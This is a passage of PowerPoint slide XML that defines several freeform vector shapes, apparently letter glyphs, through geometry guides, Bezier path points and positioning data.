                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 62"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="62">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="62"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62"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18" name="Freeform 959">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5CED3B4-F57A-4F03-8A71-CC6218A13BF2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId135"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4618038" y="2317751"/>
              <a:ext cx="47625" cy="50800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 45 w 135"/>
                <a:gd name="T1" fmla="*/ 27 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 135"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 1 w 135"/>
                <a:gd name="T5" fmla="*/ 27 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 135"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 135"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 39 w 135"/>
                <a:gd name="T11" fmla="*/ 129 h 147"/>
                <a:gd name="T12" fmla="*/ 45 w 135"/>
                <a:gd name="T13" fmla="*/ 27 h 147"/>
                <a:gd name="T14" fmla="*/ 134 w 135"/>
                <a:gd name="T15" fmla="*/ 27 h 147"/>
                <a:gd name="T16" fmla="*/ 112 w 135"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 89 w 135"/>
                <a:gd name="T19" fmla="*/ 27 h 147"/>
                <a:gd name="T20" fmla="*/ 96 w 135"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 112 w 135"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 127 w 135"/>
                <a:gd name="T25" fmla="*/ 129 h 147"/>
                <a:gd name="T26" fmla="*/ 134 w 135"/>
                <a:gd name="T27" fmla="*/ 2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5" h="147">
                  <a:moveTo>
                    <a:pt x="45" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="4"/>
                    <a:pt x="30" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="1" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="147"/>
                    <a:pt x="38" y="138"/>
                    <a:pt x="39" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45" y="27"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="4"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="0"/>
                    <a:pt x="88" y="6"/>
                    <a:pt x="89" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="136"/>
                    <a:pt x="98" y="147"/>
                    <a:pt x="112" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="147"/>
                    <a:pt x="127" y="138"/>
                    <a:pt x="127" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134" y="2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19" name="Freeform 960">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3568A97F-17A1-4AF3-937F-3EA0EBEEA17A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId136"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4689476" y="2349501"/>
              <a:ext cx="85725" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 250"/>
                <a:gd name="T1" fmla="*/ 27 h 218"/>
                <a:gd name="T2" fmla="*/ 57 w 250"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 250"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 250"/>
                <a:gd name="T7" fmla="*/ 19 h 218"/>
                <a:gd name="T8" fmla="*/ 20 w 250"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 43 w 250"/>
                <a:gd name="T11" fmla="*/ 34 h 218"/>
                <a:gd name="T12" fmla="*/ 43 w 250"/>
                <a:gd name="T13" fmla="*/ 188 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 250"/>
                <a:gd name="T15" fmla="*/ 188 h 218"/>
                <a:gd name="T16" fmla="*/ 0 w 250"/>
                <a:gd name="T17" fmla="*/ 203 h 218"/>
                <a:gd name="T18" fmla="*/ 20 w 250"/>
                <a:gd name="T19" fmla="*/ 218 h 218"/>
                <a:gd name="T20" fmla="*/ 99 w 250"/>
                <a:gd name="T21" fmla="*/ 218 h 218"/>
                <a:gd name="T22" fmla="*/ 119 w 250"/>
                <a:gd name="T23" fmla="*/ 203 h 218"/>
                <a:gd name="T24" fmla="*/ 99 w 250"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 250"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 250"/>
                <a:gd name="T29" fmla="*/ 100 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 250"/>
                <a:gd name="T31" fmla="*/ 31 h 218"/>
                <a:gd name="T32" fmla="*/ 173 w 250"/>
                <a:gd name="T33" fmla="*/ 75 h 218"/>
                <a:gd name="T34" fmla="*/ 173 w 250"/>
                <a:gd name="T35" fmla="*/ 188 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 250"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 133 w 250"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 250"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 230 w 250"/>
                <a:gd name="T43" fmla="*/ 218 h 218"/>
                <a:gd name="T44" fmla="*/ 250 w 250"/>
                <a:gd name="T45" fmla="*/ 203 h 218"/>
                <a:gd name="T46" fmla="*/ 229 w 250"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 207 w 250"/>
                <a:gd name="T49" fmla="*/ 188 h 218"/>
                <a:gd name="T50" fmla="*/ 207 w 250"/>
                <a:gd name="T51" fmla="*/ 72 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 250"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 77 w 250"/>
                <a:gd name="T55" fmla="*/ 2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0" h="218">
                  <a:moveTo>
                    <a:pt x="77" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="11"/>
                    <a:pt x="77" y="3"/>
                    <a:pt x="57" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="13" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="43" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="218"/>
                    <a:pt x="119" y="218"/>
                    <a:pt x="119" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="188"/>
                    <a:pt x="107" y="188"/>
                    <a:pt x="99" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="100"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="50"/>
                    <a:pt x="114" y="31"/>
                    <a:pt x="139" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="31"/>
                    <a:pt x="173" y="45"/>
                    <a:pt x="173" y="75"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="188"/>
                    <a:pt x="133" y="188"/>
                    <a:pt x="133" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="218"/>
                    <a:pt x="146" y="218"/>
                    <a:pt x="153" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="230" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="218"/>
                    <a:pt x="250" y="218"/>
                    <a:pt x="250" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="188"/>
                    <a:pt x="237" y="188"/>
                    <a:pt x="229" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="22"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="142" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="0"/>
                    <a:pt x="87" y="17"/>
                    <a:pt x="77" y="2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0" name="Freeform 961">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E70E8B55-794F-4085-9E8D-8497A9A3E6A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId137"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4786313" y="2349501"/>
              <a:ext cx="80963" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 234"/>
                <a:gd name="T1" fmla="*/ 203 h 222"/>
                <a:gd name="T2" fmla="*/ 209 w 234"/>
                <a:gd name="T3" fmla="*/ 219 h 222"/>
                <a:gd name="T4" fmla="*/ 234 w 234"/>
                <a:gd name="T5" fmla="*/ 204 h 222"/>
                <a:gd name="T6" fmla="*/ 214 w 234"/>
                <a:gd name="T7" fmla="*/ 189 h 222"/>
                <a:gd name="T8" fmla="*/ 184 w 234"/>
                <a:gd name="T9" fmla="*/ 185 h 222"/>
                <a:gd name="T10" fmla="*/ 184 w 234"/>
                <a:gd name="T11" fmla="*/ 77 h 222"/>
                <a:gd name="T12" fmla="*/ 85 w 234"/>
                <a:gd name="T13" fmla="*/ 0 h 222"/>
                <a:gd name="T14" fmla="*/ 13 w 234"/>
                <a:gd name="T15" fmla="*/ 36 h 222"/>
                <a:gd name="T16" fmla="*/ 36 w 234"/>
                <a:gd name="T17" fmla="*/ 59 h 222"/>
                <a:gd name="T18" fmla="*/ 58 w 234"/>
                <a:gd name="T19" fmla="*/ 36 h 222"/>
                <a:gd name="T20" fmla="*/ 68 w 234"/>
                <a:gd name="T21" fmla="*/ 31 h 222"/>
                <a:gd name="T22" fmla="*/ 86 w 234"/>
                <a:gd name="T23" fmla="*/ 30 h 222"/>
                <a:gd name="T24" fmla="*/ 150 w 234"/>
                <a:gd name="T25" fmla="*/ 81 h 222"/>
                <a:gd name="T26" fmla="*/ 0 w 234"/>
                <a:gd name="T27" fmla="*/ 155 h 222"/>
                <a:gd name="T28" fmla="*/ 82 w 234"/>
                <a:gd name="T29" fmla="*/ 222 h 222"/>
                <a:gd name="T30" fmla="*/ 155 w 234"/>
                <a:gd name="T31" fmla="*/ 203 h 222"/>
                <a:gd name="T32" fmla="*/ 150 w 234"/>
                <a:gd name="T33" fmla="*/ 110 h 222"/>
                <a:gd name="T34" fmla="*/ 150 w 234"/>
                <a:gd name="T35" fmla="*/ 152 h 222"/>
                <a:gd name="T36" fmla="*/ 130 w 234"/>
                <a:gd name="T37" fmla="*/ 183 h 222"/>
                <a:gd name="T38" fmla="*/ 86 w 234"/>
                <a:gd name="T39" fmla="*/ 192 h 222"/>
                <a:gd name="T40" fmla="*/ 35 w 234"/>
                <a:gd name="T41" fmla="*/ 155 h 222"/>
                <a:gd name="T42" fmla="*/ 150 w 234"/>
                <a:gd name="T43" fmla="*/ 1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4" h="222">
                  <a:moveTo>
                    <a:pt x="155" y="203"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="219"/>
                    <a:pt x="190" y="219"/>
                    <a:pt x="209" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="219"/>
                    <a:pt x="234" y="219"/>
                    <a:pt x="234" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="189"/>
                    <a:pt x="222" y="189"/>
                    <a:pt x="214" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="189"/>
                    <a:pt x="188" y="186"/>
                    <a:pt x="184" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="42"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="51"/>
                    <a:pt x="24" y="59"/>
                    <a:pt x="36" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="59"/>
                    <a:pt x="57" y="55"/>
                    <a:pt x="58" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="32"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="68" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="30"/>
                    <a:pt x="81" y="30"/>
                    <a:pt x="86" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="30"/>
                    <a:pt x="150" y="46"/>
                    <a:pt x="150" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="83"/>
                    <a:pt x="0" y="108"/>
                    <a:pt x="0" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="190"/>
                    <a:pt x="32" y="222"/>
                    <a:pt x="82" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="222"/>
                    <a:pt x="132" y="219"/>
                    <a:pt x="155" y="203"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="150" y="110"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150" y="152"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="164"/>
                    <a:pt x="150" y="174"/>
                    <a:pt x="130" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="192"/>
                    <a:pt x="90" y="192"/>
                    <a:pt x="86" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="192"/>
                    <a:pt x="35" y="175"/>
                    <a:pt x="35" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="131"/>
                    <a:pt x="77" y="112"/>
                    <a:pt x="150" y="11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1" name="Freeform 962">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F197929-394E-47BA-8702-5CEF2F7443AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId138"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4867276" y="2349501"/>
              <a:ext cx="88900" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 57 w 260"/>
                <a:gd name="T1" fmla="*/ 18 h 218"/>
                <a:gd name="T2" fmla="*/ 37 w 260"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 260"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 260"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 29 w 260"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 29 w 260"/>
                <a:gd name="T11" fmla="*/ 188 h 218"/>
                <a:gd name="T12" fmla="*/ 0 w 260"/>
                <a:gd name="T13" fmla="*/ 203 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 260"/>
                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 65 w 260"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 85 w 260"/>
                <a:gd name="T19" fmla="*/ 203 h 218"/>
                <a:gd name="T20" fmla="*/ 57 w 260"/>
                <a:gd name="T21" fmla="*/ 188 h 218"/>
                <a:gd name="T22" fmla="*/ 57 w 260"/>
                <a:gd name="T23" fmla="*/ 99 h 218"/>
                <a:gd name="T24" fmla="*/ 98 w 260"/>
                <a:gd name="T25" fmla="*/ 31 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 260"/>
                <a:gd name="T27" fmla="*/ 72 h 218"/>
                <a:gd name="T28" fmla="*/ 116 w 260"/>
                <a:gd name="T29" fmla="*/ 188 h 218"/>
                <a:gd name="T30" fmla="*/ 94 w 260"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 114 w 260"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 152 w 260"/>
                <a:gd name="T35" fmla="*/ 218 h 218"/>
                <a:gd name="T36" fmla="*/ 172 w 260"/>
                <a:gd name="T37" fmla="*/ 203 h 218"/>
                <a:gd name="T38" fmla="*/ 144 w 260"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 144 w 260"/>
                <a:gd name="T41" fmla="*/ 99 h 218"/>
                <a:gd name="T42" fmla="*/ 185 w 260"/>
                <a:gd name="T43" fmla="*/ 31 h 218"/>
                <a:gd name="T44" fmla="*/ 203 w 260"/>
                <a:gd name="T45" fmla="*/ 72 h 218"/>
                <a:gd name="T46" fmla="*/ 203 w 260"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 181 w 260"/>
                <a:gd name="T49" fmla="*/ 203 h 218"/>
                <a:gd name="T50" fmla="*/ 202 w 260"/>
                <a:gd name="T51" fmla="*/ 218 h 218"/>
                <a:gd name="T52" fmla="*/ 239 w 260"/>
                <a:gd name="T53" fmla="*/ 218 h 218"/>
                <a:gd name="T54" fmla="*/ 260 w 260"/>
                <a:gd name="T55" fmla="*/ 203 h 218"/>
                <a:gd name="T56" fmla="*/ 231 w 260"/>
                <a:gd name="T57" fmla="*/ 188 h 218"/>
                <a:gd name="T58" fmla="*/ 231 w 260"/>
                <a:gd name="T59" fmla="*/ 67 h 218"/>
                <a:gd name="T60" fmla="*/ 187 w 260"/>
                <a:gd name="T61" fmla="*/ 0 h 218"/>
                <a:gd name="T62" fmla="*/ 137 w 260"/>
                <a:gd name="T63" fmla="*/ 26 h 218"/>
                <a:gd name="T64" fmla="*/ 100 w 260"/>
                <a:gd name="T65" fmla="*/ 0 h 218"/>
                <a:gd name="T66" fmla="*/ 57 w 260"/>
                <a:gd name="T67"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0" h="218">
                  <a:moveTo>
                    <a:pt x="57" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="3"/>
                    <a:pt x="46" y="3"/>
                    <a:pt x="37" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="11" y="34"/>
                    <a:pt x="29" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="29" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="14" y="218"/>
                    <a:pt x="21" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="65" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="218"/>
                    <a:pt x="85" y="218"/>
                    <a:pt x="85" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="75" y="188"/>
                    <a:pt x="57" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="54"/>
                    <a:pt x="77" y="31"/>
                    <a:pt x="98" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="31"/>
                    <a:pt x="116" y="39"/>
                    <a:pt x="116" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="188"/>
                    <a:pt x="94" y="188"/>
                    <a:pt x="94" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="218"/>
                    <a:pt x="107" y="218"/>
                    <a:pt x="114" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="152" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="218"/>
                    <a:pt x="172" y="218"/>
                    <a:pt x="172" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="188"/>
                    <a:pt x="162" y="188"/>
                    <a:pt x="144" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="144" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="54"/>
                    <a:pt x="164" y="31"/>
                    <a:pt x="185" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="31"/>
                    <a:pt x="203" y="39"/>
                    <a:pt x="203" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="203" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="188"/>
                    <a:pt x="181" y="188"/>
                    <a:pt x="181" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="218"/>
                    <a:pt x="195" y="218"/>
                    <a:pt x="202" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="239" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="247" y="218"/>
                    <a:pt x="260" y="218"/>
                    <a:pt x="260" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="260" y="188"/>
                    <a:pt x="249" y="188"/>
                    <a:pt x="231" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="231" y="67"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="57"/>
                    <a:pt x="231" y="0"/>
                    <a:pt x="187" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="0"/>
                    <a:pt x="151" y="7"/>
                    <a:pt x="137" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="9"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="100" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="0"/>
                    <a:pt x="69" y="7"/>
                    <a:pt x="57" y="1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2" name="Freeform 963">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{385F29B9-458A-4940-AAFB-CECF775AE891}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId139"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4967288" y="2349501"/>
              <a:ext cx="69850" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
